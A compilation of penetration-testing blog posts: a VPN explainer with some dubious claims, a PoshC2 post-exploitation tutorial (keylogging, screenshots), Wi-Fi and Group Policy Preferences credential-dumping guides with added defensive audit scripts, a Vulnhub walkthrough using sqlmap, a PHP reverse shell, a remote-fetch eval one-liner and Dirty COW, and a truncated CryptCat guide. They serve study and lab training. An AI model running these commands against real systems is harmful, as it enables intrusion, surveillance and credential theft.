
How VPN Technology Protects Your Privacy from Hackers


Introduction

Picture this: the year is 2020. People store their most sensitive data online. They blindly trust that their information is safe, and they do nothing to protect it. Criminals can hack into these people’s computers and steal all of their information, ruining their lives.

This isn’t the plot to a dystopian movie; this is real life.

Cyber Attacks

Cyber attacks happen every day, and few people do anything to stop them. Even on the heels of the enormous data breaches of last year, people were mostly unfazed. 7.9 billion consumer records were compromised last year, which is terrifying. It may simply be that people aren’t familiar with using a VPN.

Why is a VPN Useful?

A VPN is a means of protecting someone when they’re online.

A way to think about life online is someone driving an empty bus. Every time that person performs any action online, they get a passenger to walk into the bus. That passenger has a briefcase with invoices, receipts, time spent on the page, and pages the driver visited. The big problem is that passengers will never get off the bus. Every new page clicked online equals a new passenger on the bus.

There are a few problems with this situation. First off, the briefcases have no locks on them. Whoever holds them, can open it and look through all of the documents.

This leads to the second point. The documents enclosed are incredibly private and sensitive. They could contain Social Security and credit card numbers, a huge list of transaction history, as well as a timestamp of every site ever visited.

Some people may not see this as an issue. As long as they’re driving the bus and they keep the door closed, why should they have to worry?

Well, if the driver did anything illegal and the police pull them over, the police can look in every single briefcase on that bus. Even worse, if a criminal hijacks the bus, they can take every briefcase for themselves.

This is where a VPN comes in. A VPN acts as a second, unregistered, self-driving bus.

Now, when the user makes an interaction online, the passenger goes into the self-driving bus with their briefcase. The internet user’s bus will stay empty at all times.

The other key point is that these passenger’s briefcases will be mostly empty. There will be no names registered to the information. All of the sensitive information will be encrypted and unreadable.

VPN is a Universal Concept

All across the globe, people care about protecting their sensitive information. Luckily, a VPN is not region-specific. In other words, an American can use a VPN server in Australia. Due to the different levels of technology across the world, a lot of people are recommending an Indian VPN server. The reason is that India has a huge infrastructure set up in the technology space.

Using a VPN server from another country takes yet another step to protect the user. Since it creates another step between the user and the information, it keeps them even safer.

Who is a VPN for?

This is not to be misconstrued, though. A VPN is not just for criminals or people who want to stay invisible as they break the law. In fact, the most notorious online criminal was found and arrested despite his VPN usage. No, a VPN is not for criminals.

A VPN should ideally be used for anyone who uses the internet. It keeps information private and keeps people safe.

Ultimately, it’s taking matters into one’s own hands. It’s been proven time and time again that companies do not value customer information as much as the customers do. They don’t take the necessary precautions. This leads to breach after breach of customer information over the years.

The way a customer’s information stays safe is if the customer keeps it safe. A VPN should be used by anyone who accesses the internet.

Other Uses for a VPN

A VPN is not just used to keep data secure; it actually has a lot of uses.

Some countries have very strict restrictions on their internet usage. For example, over the years different countries completely blocked the use of Facebook. They use geo-tags to block a user’s access to the site based on their physical location. One of the things that a VPN does is strip away a user’s geo-tags. Someone in a country that blocks a site can still access the site using a VPN.

Another common use of a VPN is done in the company’s offices. By having a VPN set up, the workers can go home and access their computer. It works on the same principle as a Facebook blockage. The VPN confuses the workstation, making it think it’s still in the office. A VPN lets office workers work from home without any problem.

Sometimes sites like Netflix, Hulu, or Pandora only allow people in a certain country to enjoy certain content. This can get frustrating and oftentimes it’s due to contract agreements. This is yet another place where a VPN shines. The user can put on their VPN mask and access content that would otherwise be inaccessible from continents away.

Conclusion

Overall there are a lot of interesting facts and uses for VPNs. They protect people from cyberattacks, they keep everyone’s data safe, and they keep hackers away from the user’s sensitive information.

VPNs are useful for anyone who accesses the internet. They can help people in countries that have internet restrictions, help office workers work from home, and allow people to view content from other countries. It’s a very interesting technology, and as the world develops there are sure to be more uses for it.

The post How VPN Technology Protects Your Privacy from Hackers appeared first on Hacking Articles.


Command & Control: PoshC2


PoshC2 is an open-source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 primarily focuses on Windows implantation, it does contain a basic Python dropper for Linux/macOS.

Table of Contents

  • Introduction
  • Features
  • Installation
  • Enumerate User Information
  • Enumerate Computer Information
  • Find All Vulnerabilities
  • Invoke ARP Scan
  • Get Key Strokes
  • Get Screenshot

Features of PoshC2

  • Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
  • A large number of payloads generated out-of-the-box which are frequently updated and are maintained to bypass common Anti-Virus products.
  • Auto-generated Apache Rewrite rules for use in C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
  • A modular format allowing users to create or edit C#, PowerShell or Python3 modules which are run in-memory by the Implants.
  • Notifications on receiving a successful Implant, such as via text message or Pushover.
  • A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history, and suggestions.
  • Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
  • Client/Server format allowing multiple team members to utilize a single C2 server.
  • Extensive logging. Every action and response is timestamped and stored in a database with all relevant information such as user, host, implant number, etc. In addition to this, the C2 server output is directly logged to a separate file.
  • Support for Docker, allowing reliable and cross-platform execution

Installation of PoshC2

We can install PoshC2 automatically for Python3 using the curl command. We need an elevated shell to execute this command successfully.

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash

Now that we have installed PoshC2 from GitHub, we need to configure the listener with our IP address. This is done by editing the config file using the following command:

posh-config

After the required configuration is done, we need to open two terminal instances, one for the server and one for the handler. First we run the Implant Handler, which is used to issue commands to the server and the implants.

posh

Further, we will run the server which will communicate with the Implants and receive task output.

posh-server

You can use any one of the methods depicted in the image above to gain a session. As soon as we run the payload on the target machine, it activates an implant in the Implant Handler, as shown in the image given below.

Enumerate User Information

Now that we have an active implant in PoshC2, it’s time to run some inbuilt modules to get some information about the target system. We are going to start with the user and group information. This module dumps all the local users, local groups and their memberships on the target machine, gathering the information through WMI. To initiate this module, we use the following command:

get-userinfo

After the implant has worked for a while, we see that it has successfully enumerated all the user-related information from the target machine: the local users, the local groups and the number of local groups.

Enumerate Computer Information

Having enumerated the user information, it’s now time to get information about the system. For this we use another module that is integrated into PoshC2: a Windows PowerShell script of the same name that runs in the background. It uses PsInfo from Sysinternals to gather the computer name, domain, operating system, OS architecture and much more.

get-computerinfo

After the implant has worked for a while, we see that it has successfully enumerated a lot of system-related information from the target machine.

Find All Vulnerabilities

Next comes the automated module. It enumerates the target machine for a huge range of local privilege escalation methods and works much like Windows Exploit Suggester. Like the previous module, it is a PowerShell script integrated into PoshC2. We can invoke it using the command given below:

find-allvulns

After the implant has worked for a while, we can see that it has successfully enumerated all the possible exploits that could be used to elevate privileges on this machine.

Invoke ARP Scan

We can perform an ARP scan from the implant. This is based on the PowerShell ArpScanner and uses C# AssemblyLoad. The scan uses [DllImport("iphlpapi.dll", ExactSpelling=true)] to import 'SendARP'; by default, it loops through all interfaces and performs an ARP scan of the local network based on the IP address and subnet mask provided by the network adapter. It can be invoked as shown in the image given below:

invoke-arpscan

Here, we can see that the ARP scan module has worked successfully, giving us a list of IP addresses that are on the same network as the target implant.

Get Key Strokes

Now we will try to capture some keystrokes from our target implant using the get-keystrokes module. The process has two parts: first we start the capture, then we read the captured keystrokes. Although this is an external module originally created by PowerShellMafia, the function has been changed to run in memory and not touch disk. We start capturing keystrokes with the following command:

get-keystrokes

By default, the keylogger runs for 60 minutes. It has started capturing keystrokes, as shown in the image given below:

Now to read those keystrokes, we need to run the following command:

Get-KeystrokeData

This shows us all the keystrokes typed on the target. It is better than other methods of capturing keystrokes because it also records modifier keys such as Ctrl and Shift, which can be quite helpful in some scenarios.

Get Screenshot

Now it’s time to take a look at the target’s screen, using the get-screenshot module. This is a straightforward method: the module captures the screen the target is using at the time, which is useful for gathering evidence or directly seeing what the target is doing. You can initiate this module with the following command:

get-screenshot

As you can see in the following image, the above command executed successfully and we captured the target’s live screen.

As mentioned in the above image, you can navigate to the location of the screenshot and view the target’s screen. The screenshot we captured is shown below:

Author: Kavish Tyagi is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Command & Control: PoshC2 appeared first on Hacking Articles.

Credential Dumping: Wireless


Today we will look at how wireless credentials can be dumped. We will cover credential dumping, red teaming, and the different ways those pesky wireless credentials can be obtained.

Table of Contents

  • What is Credential Dumping?
  • Credential Dumping in Real Life
  • Credential Dumping and Red Teaming
  • Credential Dumping Methods
    • netsh
    • WirelessKeyView
    • Wifi Network Properties
    • LaZagne
    • Mimikatz
    • Metasploit Framework
  • Mitigation

What is Credential Dumping?

When the term password cracking is used in the cyber world, it is used as a broad concept that covers all the methods of attacking, dumping or retrieving the passwords of a victim or target. Today, in this article, we focus solely on a technique called credential dumping.

Credential dumping is a technique through which the usernames and passwords of login accounts are extracted from the target system. It allows an attacker to obtain the credentials of multiple accounts from one person, and these credentials can be for anything: a bank, an email account, a social media account, wireless networks.

Credential Dumping in Real Life

Consider an attacker who has access to the target system and, through that access, retrieves the whole bunch of the target’s credentials. Once inside the target’s system, there are multiple methods to retrieve the credentials of a particular thing. For instance, to recover all the names and passwords of the wireless networks to which the operating system has connected, there are various methods an attacker can use, and we will try to cover all of them in this article. Another thing to note is that this dumping of credentials can be done in both internal and external penetration testing; which method is most suitable depends on the methodology and perspective of the attack.

Credential Dumping Methods

Just like the instance presented above, we will portray various methods to dump wireless credentials from a system in this article. So, let’s get started, shall we?

Manual Credential Dumping

All the Wi-Fi passwords, with their respective SSIDs, are stored in XML files. The location of these files is C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***. Here you will find that the SSID is saved in clear text, whereas the passwords are stored as keys.

Credential Dumping using netsh

Netsh is a scripting utility provided by Microsoft itself. It can be used both in the command prompt and in Windows PowerShell. Netsh is short for network shell. When executed, it provides detailed information about every network configuration the system has ever had, including the credentials of the wireless networks it has been connected to. The utility comes with various parameters that can be used to get different information as required. This method can be used in both internal and external penetration testing, as netsh commands can be executed both locally and remotely.

To get the list of the SSIDs that the device has connected to, use the following command:

netsh wlan show profiles

As a result of the above command, you can see the names of the Wi-Fi networks that the system has been connected to in the past or present, such as Meterpreter, Linuxlab, etc., as demonstrated in the image above.

Further, to reveal the password of any one of the listed SSIDs, use the following command:

netsh wlan show profile name=<SSID Name> key=clear

And just like it is shown in the image above, the result of the above command will give you the password.

Credential Dumping using WirelessKeyView

WirelessKeyView is a simple tool that accesses the XML files where wireless passwords are stored and reveals them in clear text. It was developed to recover lost and forgotten wireless network passwords. This is the perfect method for credential dumping in internal network penetration testing. To use it, simply download the tool from here and run it; you will get all the Wi-Fi names and their passwords, as shown in the image below:

Credential Dumping using Wifi Network Properties

Our next method is manual. It is useful when you have been given access to a network to work on but, for some reason, the network password hasn’t been revealed to you; it falls under the internal penetration testing methodology. To reveal the password of a wireless network manually, go to Control Panel > Network and Internet > Network and Sharing Center and click on Wi-Fi (*SSID*). In the dialogue box that opens, click the Wireless Properties button in the upper pane. Next, go to the Security tab, where you can see the password, as shown in the image below:

Credential Dumping using LaZagne

LaZagne is an open-source tool that was developed to retrieve all the passwords stored on your machine. We have covered LaZagne in another article, which you can read here. In our experience, LaZagne is an amazing tool for credential dumping and it’s the best tool for external penetration testing. To extract Wi-Fi passwords with LaZagne, simply download the tool from here and run it with the following command:

lazagne.exe wifi

After running the above command, all the Wi-Fi-related passwords with their respective SSID will be extracted.

Credential Dumping using Mimikatz

Another method that can be very useful in external penetration testing is Mimikatz. We have covered various features of Mimikatz in another article, which you can find here. Once you have a session on the victim’s machine, use the following commands to get the passwords:

getsystem
load kiwi
wifi_list_shared

And very easily you will have all the passwords at your service as shown in the image above.

Credential Dumping using Metasploit Framework

Our next method is to use Metasploit to retrieve the desired passwords. As we all know, Metasploit is a framework that provides ready-made exploits to make pentesting convenient, and it is an amazing platform for both beginners and experts in the hacking and pentesting world.

To dump credentials, Metasploit has an in-built post-exploitation module. To run it, open the Metasploit console by typing msfconsole and obtain a session on the target system using any exploit you prefer. Then background the session and use the post module to extract the Wi-Fi credentials with the following commands:

use post/windows/wlan/wlan_profile
set session 1
exploit

And just as it is shown in the image above, you will have your credentials.

Mitigation

There are various measures that you can follow in order to protect yourself from credential dumping attacks. These measures are given below:

  • Keep your employees/employers aware
  • DO NOT use the default SSID of a wireless network
  • Do not save the passwords on the system
  • Always reconnect to a Wi-Fi manually.
  • Have a different network for guests
  • Use VPN
  • Change your Wi-Fi password regularly
  • Use a different IP address instead of the default one
  • Make sure your modems don’t have a reset button, as most modems come with one. When it is pressed, it restores the default settings, which have no security layer and allow anyone to connect.
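The profile store described under Manual Credential Dumping above, and the mitigations "Do not save the passwords on the system" and "Always reconnect to a Wi-Fi manually", can be checked with a small audit script. The following Python is an added example, not part of the original article or of any tool it mentions: it parses the WLAN profile XML that Windows keeps under C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\ (the element names and namespace below are those of the standard WLAN_profile XML schema; the sample profile, its SSID and its keyMaterial value are constructed, and audit_profile, findings and audit_directory are names I have chosen). It reports which profiles have a key stored on disk and which auto-connect, without ever printing the key, so an administrator can delete or tighten those profiles.

```python
"""Audit Windows WLAN profile XML files for stored keys and auto-connect (added example)."""
import xml.etree.ElementTree as ET
from pathlib import Path

# Namespace used by the Windows WLAN_profile XML schema (v1).
NS = {"p": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# Constructed sample in the shape Windows writes under
# C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\<GUID>\<GUID>.xml.
# The keyMaterial value is a made-up placeholder, not a real DPAPI blob.
SAMPLE_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Linuxlab</name>
  <SSIDConfig><SSID><hex>4C696E75786C6162</hex><name>Linuxlab</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>true</protected>
      <keyMaterial>0102PLACEHOLDER0304</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>
"""


def audit_profile(xml_text):
    """Return the security-relevant facts of one profile; the key itself is never returned."""
    root = ET.fromstring(xml_text)

    def text(path):
        node = root.find(path, NS)
        return node.text.strip() if node is not None and node.text else None

    key_material = text("p:MSM/p:security/p:sharedKey/p:keyMaterial")
    protected = text("p:MSM/p:security/p:sharedKey/p:protected")
    return {
        "ssid": text("p:SSIDConfig/p:SSID/p:name"),
        "authentication": text("p:MSM/p:security/p:authEncryption/p:authentication"),
        "auto_connect": text("p:connectionMode") == "auto",
        "key_stored": key_material is not None,
        "key_protected": protected == "true",
    }


def findings(profile):
    """Map the audited facts onto the article's mitigations."""
    out = []
    if profile["key_stored"]:
        out.append("stored key")  # mitigation: do not save passwords on the system
        if not profile["key_protected"]:
            out.append("key not DPAPI-protected")  # would be readable straight from the XML
    if profile["auto_connect"]:
        out.append("auto-connect")  # mitigation: always reconnect manually
    return out


def audit_directory(path):
    """Audit every profile XML below `path` (e.g. the Interfaces folder); returns {file: (ssid, findings)}."""
    results = {}
    for f in Path(path).rglob("*.xml"):
        try:
            p = audit_profile(f.read_text(encoding="utf-8-sig"))
        except ET.ParseError:
            continue  # not a WLAN profile
        results[str(f)] = (p["ssid"], findings(p))
    return results


if __name__ == "__main__":
    sample = audit_profile(SAMPLE_PROFILE)
    print(sample["ssid"], sample["authentication"], findings(sample))
```

Run it against the Interfaces folder as an administrator to get a per-profile list; a profile flagged "stored key" and "auto-connect" is exactly the kind that netsh, WirelessKeyView or LaZagne would recover, and can be removed with netsh wlan delete profile.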

So, these were the methods to dump wireless credentials. Apply the suggested mitigation to your systems or networks in order to keep yourself safe from attackers. I hope these were useful and keep tuning in for various hacking techniques!

We are well aware these are tough times for everyone and, we, here at hacking articles hope and pray that everyone is safe and following the measure of self-quarantine. And for all the hacking/pen-testing enthusiasts we are working hard to bring more and more new content so that you can learn new things and use this self-isolation to its best. Stay Safe and take care! Happy Hacking!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Credential Dumping: Wireless appeared first on Hacking Articles.

Credential Dumping: Group Policy Preferences (GPP)


People may be aware of “Group Policy Preferences” in Windows Server 2008, which allow system administrators to set up specific configurations. They can be used to create a username and encrypted password on machines. But did you know that a normal user can elevate privileges to local administrator, and probably compromise the security of the entire domain, because passwords in preference items are not secured?

Table of Contents

  • What is Group Policy Preferences?
  • Why is using GPP to create a user account a bad idea?
  • Lab Setup Requirement
  • Create an Account in Domain Controller with GPP
  • Exploiting Group Policy Preferences via Metasploit -I
  • Exploiting Group Policy Preferences via Metasploit -II
  • Gpp-Decrypt
  • GP3finder
  • PowerShell Empire

What is Group Policy Preferences?

Group Policy Preferences, GPP for short, permit administrators to configure and install Windows and application settings that were previously unavailable through Group Policy. One of the most useful features of GPP is the ability to store account credentials in a policy, and these policies can make all kinds of configuration changes to machines, like:

  • Map Drives
  • Create Local Users
  • Data Sources
  • Printer configuration
  • Registry Settings
  • Create/Update Services
  • Scheduled Tasks
  • Change local Administrator passwords

Why is using GPP to create a user account a bad idea?

If you use Microsoft GPP to create a local administrator account, consider the security consequences carefully: the password is stored in SYSVOL in a preference item. SYSVOL is the domain-wide shared folder in Active Directory that is accessible to all authenticated users.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

When a new GPP is created for a user or group account, it is associated with a Groups.xml file created in SYSVOL with the relevant configuration information, and the password in it is AES-256 encrypted. The password is nevertheless not secure at all, because every authenticated user has access to SYSVOL.

“In this article, we will be doing active directory penetration testing through Group Policy Preferences and try to steal store password from inside SYSVOL in multiple ways”.

Let’s Start!!

Lab Setup Requirement

  • Microsoft Windows Server 2008 r2
  • Microsoft Windows 7/10
  • Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain Controller” using Group Policy Management.

Now create a new user account by navigating to Computer Configuration > Control Panel Settings > Local Users and Groups.

Then Right click in the “Local Users and Groups” option and select the New > Local User.

Then you get an interface for new local user property where you can create a new user account.

As you can observe from the given below image, we had created an account for user “raaz”.

Don’t forget to update the group policy configuration.

So, as I discussed above, whenever a new GPP is created for a user or group account, it is associated with a Groups.xml file stored inside SYSVOL.

From the image below, you can see the entire path that leads to the file Group.xml. As you can see, this XML file holds cpassword for user raaz within the property tags in plain text.
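Because every authenticated user can read SYSVOL, the defensive counterpart of the attacks that follow is to find every preference item that still carries a cpassword attribute and remove it, which is what Microsoft’s MS14-025 guidance asks administrators to do. The following Python is an added example, not from this article or from any of the tools it covers: it walks a Policies tree and reports each XML element that has a cpassword attribute, together with the owning GPO GUID (taken from the path) and the account the item targets, while never decrypting or printing the value. Groups.xml is the case shown in this article, but the same attribute occurs in other preference files such as Services.xml, ScheduledTasks.xml, DataSources.xml and Drives.xml, and the scanner treats them all alike. The sample Groups.xml is constructed from the path, GUID, user name and cpassword string that appear in the article; find_cpasswords and scan_policies are names I have chosen.

```python
"""Find Group Policy Preference items that still carry a cpassword attribute (added example)."""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# GPO folders under Policies\ are named by GUID in braces.
GUID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")
# Attributes that identify which account a preference item targets
# (userName in Groups.xml, accountName in Services.xml, runAs in ScheduledTasks.xml).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "newName")


def find_cpasswords(xml_text, source="<string>"):
    """Return one record per element carrying a cpassword attribute in one XML document."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return []  # not XML, or not well-formed: nothing to report
    gpo = GUID_RE.search(source)
    hits = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
        hits.append({
            "file": source,
            "gpo_guid": gpo.group(0) if gpo else None,
            "element": elem.tag,
            "account": account,
            "cpassword_present": bool(cpw),  # the value itself is never kept or printed
        })
    return hits


def scan_policies(root_dir):
    """Scan every XML file below a Policies directory (e.g. \\\\DOMAIN\\SYSVOL\\DOMAIN\\Policies)."""
    hits = []
    for path in Path(root_dir).rglob("*.xml"):
        hits.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
    return hits


# Constructed sample: the path and GUID are the ones from this article, and the
# cpassword value is the string the article decrypts; attributes mirror Groups.xml.
SAMPLE_PATH = (r"\\Pentest.Local\SYSVOL\Pentest.Local\Policies"
               r"\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml")
SAMPLE_GROUPS_XML = """<?xml version="1.0"?>
<Groups>
  <User name="raaz" image="2" changed="2020-04-01 10:00:00">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80"
        changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="raaz"/>
  </User>
</Groups>
"""


if __name__ == "__main__":
    for hit in find_cpasswords(SAMPLE_GROUPS_XML, SAMPLE_PATH):
        print(hit["gpo_guid"], hit["element"], hit["account"], hit["file"])
```

Each hit names the GPO to edit: open it in Group Policy Management, delete the preference item (or remove its password), and then rotate the account’s password, since the old value has been readable by every domain user for as long as the XML existed. Cached copies under C:\ProgramData\Microsoft\Group Policy\History on workstations, as the post module later in the article shows, should be cleaned as well.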

Exploiting Group Policy Preferences via Metasploit -I

As we know, an authorized user can access SYSVOL. Suppose I know the credentials of a client machine, say raj:Ignite@123; with these I can exploit Group Policy Preferences to get the XML file. The Metasploit auxiliary module lets you enumerate files from target domain controllers by connecting to SMB as that user.

This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft’s public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit

Hence you can observe that it has dumped the password abcd@123 from inside the Groups.xml file for user raaz.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provides a post-exploitation module for enumerating cpassword, but for this you need to have compromised the target’s machine at least once; then you can run the post module below.

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit

From the image below you can observe that it has found cpassword twice, in two different locations:

  • C:\ProgramData\Microsoft\Group Policy\History\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
  • C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

Gpp-Decrypt

Another method is to connect to the target’s machine over SMB and access SYSVOL with the help of smbclient. Execute the following command to access the shared directory with an authorized account, then move to the following path to get the Groups.xml file: SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient //192.168.1.103/SYSVOL -U raj

As you can observe, we have successfully transferred Groups.xml to our local machine. As this file holds cpassword, we now need to decrypt it.

For decryption we use gpp-decrypt, a simple Ruby script shipped with Kali Linux that decrypts a given GPP-encrypted string.

Once you have access to the Groups.xml file, you can decrypt cpassword with the following syntax:

gpp-decrypt <encrypted cpassword>
gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps password in plain text as shown below.

GP3finder

This is another script, written in Python, for decrypting cpassword; you can download the tool from here.

Once you have access to the Groups.xml file, you can decrypt cpassword with the following syntax:

gp3finder.exe -D <encrypted cpassword>
gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps password in plain text as shown below.

PowerShell Empire

This is another framework, like Metasploit, where you first need a low-privilege shell. Once you have exploited the target machine, use the privesc/gpp module to extract the password from inside the Groups.xml file.

This module retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

agents
usemodule privesc/gpp
execute

As a result, it dumps password in plain text as shown below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Credential Dumping: Group Policy Preferences (GPP) appeared first on Hacking Articles.

VulnUni: 1.0.1: Vulnhub Walkthrough


Hello everyone, and welcome to yet another CTF challenge from emaragkos, called ‘VulnUni: 1.0.1’, which is available online on Vulnhub for those who want to improve their skills in penetration testing and black box testing.

Level: Easy

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

  • Scanning
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing the HTTP service
    • Extracting URLs through the Burp Suite spider
  • Exploitation
    • Using sqlmap to exploit the SQL injection vulnerability
    • Extracting user information using sqlmap
  • Privilege Escalation
    • Uploading a PHP shell
    • Using msfconsole web delivery to get a reverse shell
    • Using DirtyCow to exploit the kernel version
  • Capturing the flag

Walkthrough

Let’s get started and pwn this machine!

Scanning

To identify our target, we will use netdiscover and our target IP is 192.168.1.148 as shown in the image below:

Let’s proceed further with Nmap to scan our target IP for open ports, if any. Use the following command to scan the IP:

nmap -A 192.168.1.148

As the result shows, port 80 is open, running an HTTP service.

Enumeration

Continuing the enumeration, we opened the target IP in the browser. The web page we came across was about a university.

We couldn’t find anything useful here, so we moved on and started a directory brute force to enumerate the machine further. This gave us some directories and files, namely contact, about, courses, etc., but apart from this there wasn’t anything useful.

Then I launched Burp Suite and captured the request to the URL in the Intercept tab, as shown in the following image:

Further, through the Spider feature of Burp Suite, we were able to find many URLs. Of these, the E-Class URL was opened. Along with this, we also found the application version, 1.7.2, which could be vulnerable and exploitable. We made a note of this, as it will be useful later in pwning the lab.

The e-class directory gave us a login form. When we tried to log in with the default username and password, admin:admin, we were logged in successfully.

But after logging in there was a Document Expired error and the URL was redirecting to Vulnuni.local as shown in the image below :

Therefore, we added the host to our /etc/hosts file just like in the image below :

Earlier, we found that the application was using version 1.7.2, which is outdated. After gathering open-source intelligence, we found that this particular version was vulnerable to an exploit available on exploit-db, as shown in the image below:

To use the exploit to our advantage, we needed to capture the request of the login page through burpsuite as shown in the image below :

After capturing the request, copy it to a text file and save it, as shown in the following image:

Now, with the help of sqlmap, we will inject our malicious query using the following command:

sqlmap -r vulnuni --dbs --batch

Executing the above command revealed five databases in total, as shown in the image below. All we need now is to get credentials from one of them.

Since the e-class directory had already proved important during the challenge, we decided to pull the credentials from the eclass database first, hence the following command:

sqlmap -r vulnuni -D eclass -T user -C password --dump --batch

We found a few passwords, as shown below, and tried them one by one to log in.

We soon logged in successfully; the working password was ilikecats89, which you can also observe in the image below:

While browsing the application we found a page through which we can upload our shell: http://vulnuni.local/vulnuni-eclass/modules/course_info/restore_course.php

To upload our malicious file, we first downloaded a PHP reverse shell, changed the IP and PORT to our local host and local port, and then uploaded it as a compressed archive. You will find the same in the image below:

After uploading the shell, we started a netcat listener with the following command:

sudo nc -nvlp 443

Once the shell file is executed, we have our shell through netcat, as shown in the image below:

Since this is not the best working environment, we moved on to Metasploit's web_delivery module to convert our netcat session into a meterpreter one, which gives us more options. For this, type:

use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.145
set payload php/meterpreter/reverse_tcp
set srvport 4445
exploit

Note: the module prints a PHP one-liner of the form php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.92/Oyd1Yv5lI'));"; we ran it in the netcat shell obtained above to get the meterpreter session.

Next, upgrade the shell to a TTY shell, which is far more usable. For this conversion, use the following command:

python -c 'import pty;pty.spawn("/bin/bash")'

With the TTY shell, we navigated through several directories and found the user flag in the home directory using the following commands:

cd /home
ls
cd vuluni
cat flag.txt

Privilege Escalation

We use the following command to get the kernel version of the target machine:

uname -r

Through OSINT we found that this kernel is vulnerable to Dirty COW. We therefore downloaded the exploit to our local machine, saved it in /var/www/html and started the Apache server on port 80. We then fetched the dirtycow.c file into the /tmp directory of the target with the following commands:

cd /tmp
wget http://192.168.1.145/dirtycow.c

Now compile the exploit's C source into an executable and run it. gcc's -o flag names the output binary and produces it with execute permission, so no separate chmod is needed:

gcc dirtycow.c -o root -pthread
./root
cd /root
ls
cat flag.txt

And voila!! We have successfully rooted the lab.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.

The post VulnUni: 1.0.1: Vulnhub Walkthrough appeared first on Hacking Articles.

Comprehensive Guide on CryptCat


In this article, we cover the basic functionality of CryptCat and how to get a session with it.

Table of Content

  • Introduction
  • Chat
  • Verbose mode
  • Protect with Password
  • Reverse Shell
  • Randomize port
  • Timeout and Delay interval
  • Netcat vs CryptCat 

Introduction

CryptCat is the standard Netcat enhanced with two-way encryption (it uses the Twofish cipher). Like Netcat, it is a simple Unix utility that reads and writes data across network connections over TCP or UDP, but it encrypts the data transmitted over the network. It is a reliable back-end tool that is easily driven by other programs and scripts, and is considered a network debugging and exploration tool.

CryptCat acts as a TCP/UDP client when it connects to a socket, or as a server when it listens on one. It takes a password, adds a salt and derives the key used to encrypt the data sent over the connection. If no password is specified it uses the default password, “metallica”, which anyone can look up, so always set your own with -k.

We can explore its working and usage by exploring its available options.

cryptcat -h

Chat

CryptCat can be used to chat between two users. We need to establish a connection before the chat: of the two systems, one acts as the listener and the other as the initiator, so that communication can flow from both ends.

Here, we are trying to create a scenario of chat between two users with different operating systems.

User 1

OS: Kali Linux

IP Address: 192.168.0.107

Role: Listener

To start a listener on Kali Linux, run:

cryptcat -l -p 42

User 2

OS: Ubuntu

IP Address: 192.168.0.108

Role: Initiator

